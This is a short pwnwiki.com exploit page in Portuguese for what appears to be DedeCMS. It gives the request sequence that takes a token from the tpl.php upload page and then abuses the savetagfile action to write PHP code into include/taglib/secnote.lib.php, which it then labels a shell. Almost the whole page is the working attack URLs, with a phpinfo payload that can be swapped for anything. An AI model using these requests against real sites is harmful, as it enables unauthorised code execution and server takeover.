pwnwiki.com
,
Exploit
Primeiro, pegue o token: domain + /dede/tpl.php?action=upload
O token pode ser obtido visualizando o código-fonte da página
http://127.0.0.1/uploads/dede/tpl.php?action=upload
Então visite:
http://127.0.0.1/dede/tpl.php?filename=secnote.lib.php&action=savetagfile&content=<?php phpinfo();?>&token=<TOKEN>
Shell
http://127.0.0.1/include/taglib/secnote.lib.php
免费、自由、人人可编辑的漏洞库
